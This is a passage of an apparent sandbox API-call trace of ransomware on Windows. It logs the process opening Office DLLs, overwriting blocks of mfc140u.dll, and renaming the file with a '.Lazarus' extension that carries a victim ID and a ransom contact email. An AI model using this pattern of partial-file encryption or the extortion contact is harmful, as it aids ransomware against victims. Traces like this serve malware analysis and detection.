lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0100.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0100.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.088] AreFileApisANSI () returned 1 [0100.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0100.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0100.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\concrt140.dll") returned 60 [0100.088] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\concrt140.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\concrt140.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd11f68b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd11f68b6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd191da0e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x514a8)) returned 1 [0100.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0100.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.088] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1242d5d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1242d5d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1bcc41c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5644a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="mfc140u.dll", cAlternateFileName="")) returned 1 [0100.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0100.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0100.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0100.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ad80 [0100.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0100.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0100.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0100.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0100.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.089] AreFileApisANSI () returned 1 [0100.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll", lpUsedDefaultChar=0x0) returned 58 [0100.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0100.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0100.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.090] AreFileApisANSI () returned 1 [0100.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0100.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a430 [0100.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll") returned 58 [0100.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\mfc140u.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.090] GetFileType (hFile=0x418) returned 0x1 [0100.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0100.090] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.090] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.090] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.091] CloseHandle (hObject=0x418) returned 1 [0100.091] AreFileApisANSI () returned 1 [0100.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0100.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0100.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll") returned 58 [0100.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\mfc140u.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.091] GetFileType (hFile=0x418) returned 0x1 [0100.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0100.091] CloseHandle (hObject=0x418) returned 1 [0100.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0100.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0100.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.092] AreFileApisANSI () returned 1 [0100.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0100.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0100.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll") returned 58 [0100.092] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\mfc140u.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1242d5d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1242d5d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1bcc41c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5644a0)) returned 1 [0100.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0100.093] AreFileApisANSI () returned 1 [0100.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0100.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0100.093] GetLastError () returned 0x0 [0100.093] SetLastError (dwErrCode=0x0) [0100.093] AreFileApisANSI () returned 1 [0100.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0100.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0100.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll") returned 58 [0100.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\mfc140u.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.093] GetFileType (hFile=0x418) returned 0x1 [0100.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.093] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0100.094] ReadFile (in: hFile=0x418, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0100.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x944a8 [0100.096] ReadFile (in: hFile=0x418, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0100.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0100.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0100.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e228 [0100.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0100.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0100.098] GetLastError () returned 0x0 [0100.098] SetLastError (dwErrCode=0x0) [0100.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.098] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0100.098] WriteFile (in: hFile=0x418, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0100.099] WriteFile (in: hFile=0x418, lpBuffer=0x944a8*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0100.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x944a8 | out: hHeap=0x20000) returned 1 [0100.099] CloseHandle (hObject=0x418) returned 1 [0100.099] AreFileApisANSI () returned 1 [0100.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0100.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0100.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll") returned 58 [0100.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\mfc140u.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.100] GetFileType (hFile=0x418) returned 0x1 [0100.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0100.100] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0100.100] ReadFile (in: hFile=0x418, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0100.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x944a8 [0100.102] ReadFile (in: hFile=0x418, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0100.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4ddc8 [0100.103] GetLastError () returned 0x0 [0100.103] SetLastError (dwErrCode=0x0) [0100.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0100.103] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0100.103] WriteFile (in: hFile=0x418, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0100.103] WriteFile (in: hFile=0x418, lpBuffer=0x944a8*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0100.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x944a8 | out: hHeap=0x20000) returned 1 [0100.104] CloseHandle (hObject=0x418) returned 1 [0100.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0100.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71550 [0100.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0100.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ace8 [0100.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0100.104] AreFileApisANSI () returned 1 [0100.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0100.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a9b0 [0100.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll") returned 58 [0100.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ace8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 120 [0100.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xf0) returned 0x4b798 [0100.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ace8, cbMultiByte=-1, lpWideCharStr=0x4b798, cchWideChar=120 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 120 [0100.104] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\mfc140u.dll"), lpNewFileName="C:\\Program 